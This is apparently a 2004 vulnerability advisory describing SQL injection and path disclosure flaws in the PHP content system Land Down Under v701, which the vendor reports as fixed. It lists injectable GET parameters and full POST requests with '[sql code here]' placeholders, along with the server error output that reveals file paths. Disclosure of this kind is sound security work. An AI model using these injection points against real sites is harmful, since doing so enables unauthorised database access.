Multiple SQL-injections in Land Down Under v701 Date: 30.10.04 Application: Land Down Under v701 Platform: PHP Severity: Medium Link: http://www.neocrome.net Vendor Status Vulnerabilities have been fixed. Details An input validation vulnerability was reported in Land Down Under v701. A remote user can conduct SQL injection attack. 1. SQL-injections in GET /users.php?f=1&s=1'[sql code here]&w=asc&d=50 /users.php?f=1&s=name&w=1'[sql code here]&d=50 /users.php?f=1&s=name&w=asc&d=1'[sql code here] /users.php?f=1&s=1'[sql code here]&w=asc /users.php?f=1&s=name&w=1'[sql code here] /comments.php?id=1"[sql code here] 2. SQL-injections in POST POST /auth.php?m=register&a=add HTTP/1.1 Host: www.neocrome.net Content-Type: application/x-www-form-urlencoded Content-Length: 123 rusername="[sql code here]&remail=scanner@ptsecurity.com&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1 POST /auth.php?m=register&a=add HTTP/1.1 Host: www.neocrome.net Content-Type: application/x-www-form-urlencoded Content-Length: 102 rusername=1&remail="[sql code here]&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1 3. Path disclosures: /plug.php?h=1' Result: <...>
Warning: fopen(system/help/1.txt): failed to open stream: No such file or directory in /home/neocrome/public_html/system/core/plug.inc.php on line 266
Couldn't find a file : system/help/1.txt <...> POST /auth.php?m=login&a=check HTTP/1.1 Host: www.neocrome.net Content-Type: application/x-www-form-urlencoded Content-Length: 52 PHPSESSID="&rusername=1&rpassword=1&x=1&rcookiettl=1 Result: <...> ion_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /home/neocrome/public_html/system/common.php on line 169
<...> Impact A remote user can execute SQL commands on the underlying database. Solution Check for update: http://www.neocrome.net/index.php?msingle&id91.